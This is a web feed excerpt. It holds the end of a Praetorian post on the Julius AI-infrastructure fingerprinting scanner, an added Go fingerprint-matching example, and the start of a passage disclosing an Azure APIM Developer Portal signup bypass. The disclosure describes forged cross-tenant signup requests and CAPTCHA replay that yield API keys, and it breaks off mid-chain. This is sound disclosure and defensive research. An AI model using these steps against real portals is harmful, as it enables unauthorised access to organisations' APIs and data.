probes)</h3><p>This is the biggest category and the one we’ve been asked about most. Organizations deploying AI through their cloud provider often assume these endpoints are inherently private. 
They’re not — misconfigured API gateways, exposed proxy layers, and overly permissive network policies can put them on the open internet.</p><ul class="wp-block-list"> <li><strong>AWS Bedrock</strong> — Control plane and runtime detection via <code>/foundation-models</code> and <code>/model/{modelId}/converse</code></li> <li><strong>Azure OpenAI</strong> — Azure-specific OpenAI endpoint detection</li> <li><strong>Google Vertex AI</strong> — Vertex AI prediction and model endpoint detection</li> <li><strong>Databricks Model Serving</strong> — Model serving endpoint detection</li> <li><strong>Fireworks AI, Groq, Modal, Replicate, Together AI</strong> — Managed inference API detection</li> </ul><h3 class="wp-block-heading" id="1e08944b-ff5d-407a-a638-d8bbf1d3f0c7">Self-hosted inference servers (10 probes)</h3><p>These are the workhorses of production AI: high-performance inference engines that teams deploy for throughput, latency, or cost reasons. They tend to run with default configurations and minimal authentication.</p><ul class="wp-block-list"> <li><strong>SGLang</strong> — Detected via its unique <code>/server_info</code> endpoint exposing <code>mem_fraction_static</code> and <code>disaggregation_mode</code> fields</li> <li><strong>TensorRT-LLM</strong> — NVIDIA’s optimized inference runtime</li> <li><strong>Triton Inference Server</strong> — NVIDIA’s multi-framework serving platform</li> <li><strong>BentoML</strong> — ML model serving framework</li> <li><strong>Baseten Truss, DeepSpeed-MII, MLC LLM, Petals, PowerInfer, Ray Serve</strong> — Various self-hosted inference engines</li> </ul><h3 class="wp-block-heading" id="dc3a5015-fc0c-45e0-b1eb-a72a832d78a3">AI gateways and proxies (5 probes)</h3><p>The gateway layer is where organizations route, observe, and control traffic between their applications and LLM providers. 
An exposed gateway often means access to every model and API key behind it.</p><ul class="wp-block-list"> <li><strong>Portkey AI Gateway</strong> — AI gateway with provider routing and observability</li> <li><strong>Helicone</strong> — LLM observability and proxy platform</li> <li><strong>Bifrost</strong> — Multi-provider AI gateway</li> <li><strong>OmniRoute</strong> — LLM routing gateway</li> <li><strong>TensorZero</strong> — Model gateway with experimentation support</li> </ul><h3 class="wp-block-heading" id="c0a494f8-d8c6-4bcb-87eb-ce4389178f85">RAG and orchestration platforms (5 probes)</h3><p>Self-hosted RAG platforms are where things get particularly sensitive. These systems are purpose-built to ingest and query internal documents — contracts, HR policies, financial data, source code. An exposed RAG endpoint is, by definition, an exposed document store.</p><ul class="wp-block-list"> <li><strong>PrivateGPT</strong> — Private document Q&amp;A (detected via its <code>/v1/ingest/list</code> endpoint, which returns data even with zero ingested documents and auth disabled by default)</li> <li><strong>RAGFlow</strong> — Open-source RAG engine with deep document understanding</li> <li><strong>Quivr</strong> — Second brain RAG platform</li> <li><strong>h2oGPT</strong> — <a href="http://h2o.ai/" rel="noreferrer noopener">H2O.ai</a>‘s document Q&amp;A platform</li> <li><strong>Langflow</strong> — Visual LLM orchestration framework</li> </ul><h2 class="wp-block-heading" id="ccf95297-a0b7-4298-841e-a7c3e37f9f63">Why self-hosted RAG is the new shadow IT</h2><p>The OpenClaw story from our <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">last update</a> highlighted what happens when AI agent platforms get exposed: leaked API keys, filesystem access, and user impersonation. With this release, we’re seeing the same pattern play out with RAG platforms — except the stakes are different. 
Instead of agent credentials, you’re looking at the documents themselves.</p><p><strong>PrivateGPT</strong> is a good example. The entire value proposition is <em>“keep your documents private by running everything locally.”</em> The irony is that PrivateGPT’s API defaults to no authentication. Its <code>/v1/ingest/list</code> endpoint is a simple GET that returns every ingested document’s metadata, including filenames and chunk counts. The model field is hardcoded to <code>"private-gpt"</code>, which makes detection trivial and false positives near-zero.</p><p><strong>RAGFlow</strong> follows a similar pattern. Its <code>/v1/system/healthz</code> endpoint is unauthenticated and returns a JSON health check with a <code>doc_engine</code> field that’s unique to RAGFlow — it tracks the status of the Elasticsearch or Infinity backend that powers document retrieval. Even when RAGFlow is partially broken (HTTP 500), the health endpoint still responds with the same structure, making detection reliable in any state.</p><p>The problem isn’t that these tools are insecure by design. It’s that they’re easy to deploy, they serve an obvious need (“let me ask questions about our internal docs”), and teams spin them up without involving security. By the time anyone notices, the system has been indexing sensitive documents on an endpoint with no auth, no network restriction, and no monitoring.</p><p>This is shadow IT for the AI era, and it’s why discovery tooling matters.</p><h2 class="wp-block-heading" id="62d0339a-a8f9-4083-9311-4c150542b427">What else changed</h2><p>Beyond new probes, v0.2.0 includes changes to the scanner itself:</p><p><strong>Breaking API change:</strong> <code>scanner.NewScanner()</code> now requires two additional parameters — <code>maxResponseSize</code> and <code>tlsConfig</code>. 
If you’re using Julius as a library, see the <a href="https://github.com/praetorian-inc/julius/blob/main/CHANGELOG.md" rel="noreferrer noopener">migration guide</a> in the changelog.</p><p><strong>New CLI flags:</strong></p><ul class="wp-block-list"> <li><code>--max-response-size</code> — Limits response body size (default 10MB) to prevent memory exhaustion from large or malicious responses</li> <li><code>--insecure</code> — Skips TLS certificate verification for testing environments</li> <li><code>--ca-cert</code> — Specifies a custom CA certificate file for enterprise PKI environments</li> </ul><p><strong>Probe quality fixes:</strong></p><ul class="wp-block-list"> <li>Fixed the Ollama probe producing false positives on Ollama-compatible servers (SGLang, KoboldCpp) by requiring the <code>"families"</code> field in <code>/api/tags</code> responses</li> <li>Fixed <code>header.contains</code> rules that silently failed on HTTP/2 connections — this affected 5 cloud probes (AWS Bedrock, Cloudflare AI Gateway, Fireworks AI, Modal, OmniRoute)</li> <li>Removed overly generic detection blocks from Bifrost, DeepSpeed-MII, and Groq that caused cross-probe false positives</li> </ul><h2 class="wp-block-heading" id="4b0dd329-72a4-4875-af8c-d9619364d123">What this means for your assessments</h2><p>If you’re running Julius as part of your attack surface discovery workflow, update to v0.2.0:</p><pre id="510d68e8-6a8b-44a6-b4dd-9cfae893a6da" class="wp-block-code"><code>$ go install github.com/praetorian-inc/julius/cmd/julius@latest
$ julius probe &lt;target&gt;</code></pre><p>For enterprise environments with internal CAs:</p><pre id="4b986ae4-b239-4383-b14b-f92350b7e985" class="wp-block-code"><code>$ julius probe --ca-cert /path/to/ca.pem &lt;target&gt;</code></pre><p>All 63 probes are embedded in the binary. 
No external config, no probe downloads, no API keys.</p><p>The coverage now spans the full AI infrastructure stack: from cloud-managed inference (Bedrock, Azure OpenAI, Vertex AI) through self-hosted serving (SGLang, TensorRT-LLM, Triton) to the RAG and orchestration layer (PrivateGPT, RAGFlow, Langflow). If an organization is running AI infrastructure, Julius should find it.</p><p>We’re continuing to expand probe coverage as new tools emerge. If there’s a service you’re seeing in the wild that Julius doesn’t cover, <a href="https://github.com/praetorian-inc/julius/issues" rel="noreferrer noopener">open an issue</a> or submit a PR. Probes are simple YAML files — you can test locally with <code>julius validate ./probes</code> before submitting.</p><h2 class="wp-block-heading" id="1d4b8084-738e-4bd1-9649-abc7d548738e">FAQ</h2><p><strong>What’s the difference between Julius and model fingerprinting tools?</strong> Model fingerprinting identifies which LLM generated a piece of text. Julius identifies the <em>server infrastructure</em>: what software is running on the endpoint. Think of it as service detection for AI, similar to what Nmap does for traditional services.</p><p><strong>Does Julius send anything malicious?</strong> No. Julius sends standard HTTP requests (GET/POST to known paths) and analyzes the responses. It doesn’t exploit vulnerabilities, submit prompts, or modify anything on the target. It’s passive fingerprinting.</p><p><strong>How do probes get validated before release?</strong> Every probe is tested against live instances of the target service and cross-tested against other LLM services to confirm zero false positives. This release also fixed several cross-probe false positives from v0.1.x.</p><p><strong>Can I add detection for a service Julius doesn’t support yet?</strong> Yes. Probes are defined in simple YAML files. 
The <a href="https://github.com/praetorian-inc/julius/blob/main/CONTRIBUTING.md" rel="noreferrer noopener">contributing guide</a> walks through the format, and you can test locally with <code>julius validate ./probes</code> before submitting a PR.</p><p><strong>Why is there a breaking API change?</strong> The <code>NewScanner()</code> signature now requires <code>maxResponseSize</code> and <code>tlsConfig</code> parameters. This was necessary to add response size limiting (preventing OOM from malicious servers) and TLS configuration for enterprise environments. If you’re only using the CLI, nothing changes.</p><p>The post <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Michelle Rhodes">Michelle Rhodes</a>. Read the original post at: <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/</a> </p>
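The detection markers the Julius post lists (SGLang's <code>/server_info</code> fields, PrivateGPT's hardcoded model name, RAGFlow's <code>doc_engine</code> field, the Ollama <code>"families"</code> requirement) together with the new response-size limit, as an added Go example that is not Julius's own code: a small inventory matcher that classifies a captured response body by endpoint path after reading at most <code>maxSize</code> bytes. The sample responses are constructed, and the match predicates are my reading of the post's descriptions, not Julius's probe YAML.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"strings"
)

// fingerprint ties one endpoint path to a predicate over the response body.
// The markers below are the ones the post names; Julius's real probes are
// YAML files that this example does not reproduce.
type fingerprint struct {
	Name  string
	Path  string
	Match func(raw []byte, body map[string]any) bool
}

var fingerprints = []fingerprint{
	// SGLang: /server_info exposes mem_fraction_static and disaggregation_mode.
	{"SGLang", "/server_info", func(_ []byte, b map[string]any) bool {
		_, ok1 := b["mem_fraction_static"]
		_, ok2 := b["disaggregation_mode"]
		return ok1 && ok2
	}},
	// PrivateGPT: /v1/ingest/list hardcodes the model field to "private-gpt".
	{"PrivateGPT", "/v1/ingest/list", func(_ []byte, b map[string]any) bool {
		model, _ := b["model"].(string)
		return model == "private-gpt"
	}},
	// RAGFlow: /v1/system/healthz carries a doc_engine field. The HTTP status
	// is deliberately not consulted: the structure survives a 500, as the post notes.
	{"RAGFlow", "/v1/system/healthz", func(_ []byte, b map[string]any) bool {
		_, ok := b["doc_engine"]
		return ok
	}},
	// Ollama: /api/tags must contain a "families" field, which Ollama-compatible
	// servers such as SGLang and KoboldCpp omit (the v0.2.0 false-positive fix).
	{"Ollama", "/api/tags", func(raw []byte, _ map[string]any) bool {
		return strings.Contains(string(raw), `"families"`)
	}},
}

var errTooLarge = errors.New("response body exceeds the configured maximum")

// readBounded mirrors the --max-response-size hardening: it reads at most
// maxSize bytes and rejects anything larger instead of buffering it, so a
// hostile server cannot exhaust the scanner's memory with a huge reply.
func readBounded(r io.Reader, maxSize int64) ([]byte, error) {
	data, err := io.ReadAll(io.LimitReader(r, maxSize+1))
	if err != nil {
		return nil, err
	}
	if int64(len(data)) > maxSize {
		return nil, errTooLarge
	}
	return data, nil
}

// identify names the service whose fingerprint matches a response captured
// from path, or returns "" when nothing matches. Non-JSON bodies never match.
func identify(path string, r io.Reader, maxSize int64) (string, error) {
	raw, err := readBounded(r, maxSize)
	if err != nil {
		return "", err
	}
	var body map[string]any
	if err := json.Unmarshal(raw, &body); err != nil {
		return "", nil
	}
	for _, fp := range fingerprints {
		if fp.Path == path && fp.Match(raw, body) {
			return fp.Name, nil
		}
	}
	return "", nil
}

// Constructed sample responses (not captured from real hosts) that exercise
// each fingerprint plus one deliberate miss.
var samples = []struct{ path, body string }{
	{"/server_info", `{"mem_fraction_static":0.88,"disaggregation_mode":"null","max_total_num_tokens":4096}`},
	{"/v1/ingest/list", `{"object":"list","model":"private-gpt","data":[]}`},
	{"/v1/system/healthz", `{"doc_engine":{"status":"red"},"redis":{"status":"green"},"status":"red"}`},
	{"/api/tags", `{"models":[{"name":"llama3:8b","details":{"families":["llama"]}}]}`},
	// Ollama-compatible server without the "families" field: must not match.
	{"/api/tags", `{"models":[{"name":"llama3:8b"}]}`},
}

func main() {
	const maxSize = 10 << 20 // 10MB, the CLI default
	for _, s := range samples {
		name, err := identify(s.path, strings.NewReader(s.body), maxSize)
		if err != nil {
			fmt.Printf("%-20s error: %v\n", s.path, err)
			continue
		}
		if name == "" {
			name = "(no match)"
		}
		fmt.Printf("%-20s -> %s\n", s.path, name)
	}
}
```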

Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet

  • Published date: 2026-03-24 00:00:00

<div data-elementor-type="wp-post" data-elementor-id="10966" class="elementor elementor-10966" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-93afc5a e-con-full e-flex e-con e-parent" data-id="93afc5a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-86067b8 elementor-widget elementor-widget-text-editor" data-id="86067b8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The Azure APIM signup bypass is a critical vulnerability affecting 97.9% of internet-facing Developer Portals. Azure API Management (APIM) exposes APIs to external consumers through a Developer Portal, the interface where developers self-register, obtain API keys, and make API calls. The default APIM configuration ships with Basic Authentication enabled as the identity provider and the Starter product set to auto-approve subscriptions. When an administrator disables developer self-signup, they reasonably expect that endpoint to no longer be reachable.</p> <p>It doesn’t. An anonymous attacker can create an account, subscribe to API products, obtain valid API keys, and access backend services, all without authentication or relationship to the target organization. The “disable signup” toggle in Azure APIM’s Developer Portal is purely cosmetic. The backend REST API continues to accept registrations from anyone. This is an <strong>unauthenticated, internet-facing vulnerability</strong> in a service that is internet-facing by design.</p> <p>Praetorian noted that the original issue was detected by security researcher Mihalis Haatainen at <a href="https://www.bountyy.fi/">Bountyy Oy</a> in September 2025 (see <a href="https://github.com/bountyyfi/Azure-APIM-Cross-Tenant-Signup-Bypass/security/advisories/GHSA-vcwf-73jp-r7mv">GHSA-vcwf-73jp-r7mv</a>). 
Mihalis Haatainen reported the issue to Microsoft’s Security Response Center (MSRC). After two submissions and additional technical details, MSRC issued its final determination: <strong>“By design.”</strong></p> <p>Four months later, we assessed the real-world prevalence.</p> <p>We built a full reproduction environment, demonstrated the complete attack chain from anonymous internet access to sensitive API data exfiltration, and conducted a wide-scale analysis across the internet-facing APIM landscape. We found over 25,000 Azure APIM Developer Portals exposed to the internet. Based on our heuristic analysis, we estimated that 97.9% of them still accept signup requests. Only 51 instances out of 25,379 have actually removed the vulnerable Basic Authentication provider. The attack requires a web browser and a curl command; no credentials, no prior access, and no Azure subscription in the target tenant.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8c71d64 e-con-full e-flex e-con e-parent" data-id="8c71d64" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d027db elementor-widget elementor-widget-heading" data-id="4d027db" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Vulnerability</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9040393 e-con-full e-flex e-con e-parent" data-id="9040393" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-568bfd5 elementor-widget elementor-widget-text-editor" data-id="568bfd5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <a id="the-three-part-flaw"></a> </div> </div> <div data-particle_enable="false" 
data-particle-mobile-disabled="false" class="elementor-element elementor-element-a4066f6 e-con-full e-flex e-con e-parent" data-id="a4066f6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae49ae8 elementor-widget elementor-widget-heading" data-id="ae49ae8" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Three-Part Flaw</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e6910fb e-con-full e-flex e-con e-parent" data-id="e6910fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0a00cc7 elementor-widget elementor-widget-text-editor" data-id="0a00cc7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The fundamental issue is a disconnect between what administrators see in the Azure Portal and what actually happens on the backend. Three separate design decisions combine to create the vulnerability:</p> <p><strong>1. The UI toggle is cosmetic.</strong> When an administrator sets <code>portalsettings/signup.properties.enabled</code> to <code>false</code>, the developer portal reads this flag and hides the signup form. The underlying REST API endpoint at <code>/signup</code> remains active and continues to accept registration requests regardless of what the UI displays.</p> <p><strong>2. No tenant validation on the signup endpoint.</strong> Azure APIM Developer Portals are multi-tenant. The APIM infrastructure uses the <code>Host</code> header in incoming requests to route them to the correct instance. When an attacker sends a <code>POST /signup</code> request with <code>Host: victim-portal.developer.azure-api.net</code>, the infrastructure routes it to the victim’s instance. 
There is no validation that the request originated from that tenant’s portal, that the sender has any relationship to the target organization, or that the request was initiated from the target’s domain.</p> <p><strong>3. The CAPTCHA service is shared across all tenants.</strong> The signup flow includes a CAPTCHA challenge. However, the CAPTCHA validation service is global to Azure APIM. A challenge generated on Instance A is accepted as valid when submitted to Instance B.</p> <p><a id="X7b726d72045493ee04b98d787fee093aed871b0"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30e11bf e-con-full e-flex e-con e-parent" data-id="30e11bf" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5691fb elementor-widget elementor-widget-heading" data-id="a5691fb" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Kill Chain: From Anonymous Access to API Keys</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8130df1 e-con-full e-flex e-con e-parent" data-id="8130df1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-15a59e6 elementor-widget elementor-widget-text-editor" data-id="15a59e6" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Account creation is the entry point. The actual severity depends on what APIs are exposed through the Developer Portal and whether the attacker can obtain subscription keys to call them. 
We reproduced the full attack chain on controlled infrastructure to map each step.</p> <p><a id="why-account-creation-alone-is-not-enough"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aab12e7 e-con-full e-flex e-con e-parent" data-id="aab12e7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9bf00e2 elementor-widget elementor-widget-heading" data-id="9bf00e2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Why Account Creation Alone Is Not Enough</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4ebf48b e-con-full e-flex e-con e-parent" data-id="4ebf48b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-6f62cfc elementor-widget elementor-widget-text-editor" data-id="6f62cfc" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>An APIM Developer Portal account gives the attacker a session. What they can do with that session depends on the <strong>product configuration</strong>, a second layer of APIM settings that determines post-authentication access.</p> <p>APIs in APIM are not exposed directly. They are grouped into <strong>Products</strong>, and users must subscribe to a product to obtain a subscription key. Two product-level settings, <code>subscriptionRequired</code> and <code>approvalRequired</code>, determine whether an attacker can self-serve to obtain API access. The critical combination is <code>subscriptionRequired: true</code> with <code>approvalRequired: false</code> (subscription needed, but auto-approved). This is the <strong>default configuration</strong> for the built-in Starter product that ships with every new APIM instance. 
An attacker who creates an account can immediately subscribe and receive a valid API key without administrator involvement.</p> <p><a id="attack-path-overview"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6868fdd e-con-full e-flex e-con e-parent" data-id="6868fdd" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-63f1ca5 elementor-widget elementor-widget-heading" data-id="63f1ca5" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Attack Path Overview</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7dcc48d e-con-full e-flex e-con e-parent" data-id="7dcc48d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-d2a4dec elementor-widget elementor-widget-text-editor" data-id="d2a4dec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-00bfab0 e-con-full e-flex e-con e-parent" data-id="00bfab0" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3298fe1 elementor-widget elementor-widget-image" data-id="3298fe1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img fetchpriority="high" decoding="async" width="544" height="1308" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp" class="attachment-full size-full wp-image-10950" alt="Flowchart showing attack steps from anonymous attacker discovering target via Shodan to creating developer account and 
exfiltrating data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp 544w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-125x300.webp 125w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-426x1024.webp 426w" sizes="(max-width: 544px) 100vw, 544px"><figcaption class="widget-image-caption wp-caption-text">Attack path from anonymous attacker to data exfiltration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9af606b e-con-full e-flex e-con e-parent" data-id="9af606b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d2d10a elementor-widget elementor-widget-heading" data-id="4d2d10a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Simulated Attack Chain</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-589ceef e-con-full e-flex e-con e-parent" data-id="589ceef" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-741602a elementor-widget elementor-widget-text-editor" data-id="741602a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We demonstrated this against a controlled APIM instance under our ownership, configured with a mock healthcare IoT API behind the default Starter product. 
The CAPTCHA was generated cross-tenant from a separate APIM instance we control to demonstrate the cross-tenant replay.</p> <p><a id="step-1-identify-the-target."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ae38fb7 e-con-full e-flex e-con e-parent" data-id="ae38fb7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9ae8846 elementor-widget elementor-widget-heading" data-id="9ae8846" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 1: Identify the target.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79225a3 e-con-full e-flex e-con e-parent" data-id="79225a3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-65104af elementor-widget elementor-widget-text-editor" data-id="65104af" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker discovers the target’s Developer Portal hostname. 
These are publicly indexed; our Shodan enumeration found 25,379 unique instances.</p> <p>Target: apim-research-target-t3.developer.azure-api.net</p> <p><a id="X6b2794b1dd9fa9a2772ac2a5ffcb82f2e4e1b0f"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cacc5de e-con-full e-flex e-con e-parent" data-id="cacc5de" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ee4847b elementor-widget elementor-widget-heading" data-id="ee4847b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 2: Verify the target appears locked down, then bypass it.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-26e0b9e e-con-full e-flex e-con e-parent" data-id="26e0b9e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1c4f22c elementor-widget elementor-widget-text-editor" data-id="1c4f22c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The target organization’s portal shows no signup option, and the administrator has “disabled” signup. 
The only visible option is “Sign in”:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-25c2f34 e-con-full e-flex e-con e-parent" data-id="25c2f34" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-88b03ef elementor-widget elementor-widget-image" data-id="88b03ef" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="1720" height="1328" src="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp" class="attachment-full size-full wp-image-10951" alt="API portal webpage with header navigation showing Home, APIs, Products links and Sign In button, main content area displays 'page content' text" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp 1720w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-300x232.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1024x791.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-768x593.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1536x1186.webp 1536w" sizes="(max-width: 1720px) 100vw, 1720px"><figcaption class="widget-image-caption wp-caption-text">The target’s Developer Portal. The administrator has disabled signup. 
No “Sign up” button is visible anywhere on the page.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-2c45dd5 e-con-full e-flex e-con e-parent" data-id="2c45dd5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9500280 elementor-widget elementor-widget-text-editor" data-id="9500280" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, a single request confirms whether the signup endpoint is still active behind the scenes:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0f2b990 e-con-full e-flex e-con e-parent" data-id="0f2b990" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b2756da elementor-widget elementor-widget-image" data-id="b2756da" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="960" height="424" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp" class="attachment-full size-full wp-image-10952" alt="Terminal showing curl POST request to signup API returning HTTP 400 error with ValidationError for challenge and signupData fields" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-300x133.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-768x339.webp 768w" sizes="(max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-deaa032 e-con-full e-flex e-con e-parent" data-id="deaa032" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ea5391 elementor-widget elementor-widget-text-editor" data-id="4ea5391" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The HTTP 400 ValidationError with challenge and signupData fields confirms the /signup endpoint is live and Basic Auth is enabled. 
The toggle only hid the button.</p> <p><a id="step-3-create-a-cross-tenant-account."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-1ca1c56 e-con-full e-flex e-con e-parent" data-id="1ca1c56" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9a6e194 elementor-widget elementor-widget-heading" data-id="9a6e194" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 3: Create a cross-tenant account.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bc35f9d e-con-full e-flex e-con e-parent" data-id="bc35f9d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fa4a867 elementor-widget elementor-widget-text-editor" data-id="fa4a867" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker generates and solves a CAPTCHA on their own APIM instance, then replays the solution against the target:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b9bd2d3 e-con-full e-flex e-con e-parent" data-id="b9bd2d3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b3248f1 elementor-widget elementor-widget-image" data-id="b3248f1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="500" height="436" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp" class="attachment-full size-full wp-image-10953" alt="HTTP POST request to signup endpoint with JSON payload containing 
